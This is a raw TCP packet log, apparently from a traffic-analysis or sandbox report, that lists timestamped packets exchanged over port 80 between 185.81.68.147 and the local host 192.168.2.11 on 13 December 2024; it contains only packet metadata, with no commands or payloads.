                                                                                                                                                                                                Dec 13, 2024 08:18:49.808968067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.809109926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.813494921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.813571930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.813863993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.819442987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.819458008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.819587946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.841996908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.842051029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.842199087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.844439030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.844453096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.844609976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.913686991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.913707018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.913852930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.915366888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.915378094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.915494919 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.918713093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.918782949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.918895006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.922110081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.922135115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.922267914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.925437927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.925548077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.925687075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.928566933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.928581953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.928694010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.931796074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.931899071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.932019949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.934819937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.934968948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.935157061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.938014984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.938030005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.938154936 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.941200018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.941291094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.941418886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.943883896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.944204092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.944335938 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.946825027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.946877956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.946974039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.949634075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.949646950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.949788094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.952388048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.952402115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.952521086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.954880953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.954999924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.955101013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.957556009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.957715988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.957856894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.960694075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.960705996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.960810900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.962961912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.963009119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.963114977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.965601921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.965713024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.965879917 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.968316078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.968409061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.968501091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.970186949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.970350981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.970635891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.972140074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.972290039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.972434044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.973922968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.974020004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.974108934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.975912094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.975924969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.976033926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.977611065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.977730989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.977828026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.979540110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.979573011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.979684114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.981385946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.981448889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.981681108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.983267069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.983340025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.983472109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.985143900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.985269070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.985362053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.987005949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.987019062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.987143993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.988866091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.989077091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.989185095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.990708113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.990807056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.990936995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.992734909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.992748022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.992878914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.994466066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.994688988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.995045900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.996284962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.996347904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.998155117 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.998245001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.998259068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.998383999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.105775118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.106107950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.106223106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.106513023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.106832981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.108141899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.108284950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.108354092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.108697891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.109949112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.109961987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.110090017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.111635923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.111649036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.111774921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.113297939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.113311052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.113425970 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.114819050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.115109921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.116424084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.116524935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.116573095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.117264986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.118386984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.118397951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.118513107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.120304108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.120316029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.120428085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.121146917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.121311903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.121418953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.122731924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.122798920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.123692036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.124138117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.124205112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.125870943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.125926971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.125941992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.125998020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.127125025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.127363920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.127473116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.128976107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.128993034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.129105091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.130271912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.130290031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.130422115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.131647110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.131741047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.132703066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.133244991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.133290052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.133419037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.134666920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.134752035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.134869099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.136123896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.136228085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.137789011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.137804985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.137903929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.137934923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.139194965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.139225006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.139338017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.140584946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.140738964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.142244101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.142260075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.142345905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.142368078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.143642902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.143747091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.143852949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.145231962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.145248890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.145351887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.146615028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.146697998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.146817923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.148107052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.148199081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.148680925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.150269032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.150280952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.150393963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.151226044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.151237965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.151357889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.152637959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.152684927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.152800083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.154186010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.154198885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.154303074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.155612946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.156354904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.156459093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.157068014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.157181025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.158598900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.158677101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.158689022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.158720970 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.160059929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.160166979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.160290003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.161556005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.161766052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.161884069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.163330078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.163345098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.163515091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.164606094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.164788008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.164907932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.166030884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.166146040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.166758060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.167577982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.167738914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.169100046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.169203043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.169245958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.170700073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.170717955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.170823097 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.170823097 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.172461033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.172476053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.172574997 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.173614979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.173876047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.174005032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.175113916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.175688028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.176496029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.176598072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.176678896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.178008080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.178106070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.178178072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.178272963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.179481983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.179609060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.179707050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.181937933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.230664015 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.298007965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.298027039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.298227072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.298543930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.298968077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.299071074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.299808025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.300021887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.300118923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.301606894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.301625013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.301740885 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.302570105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.302586079 CET8049726185.81.68.147192.168.2.11
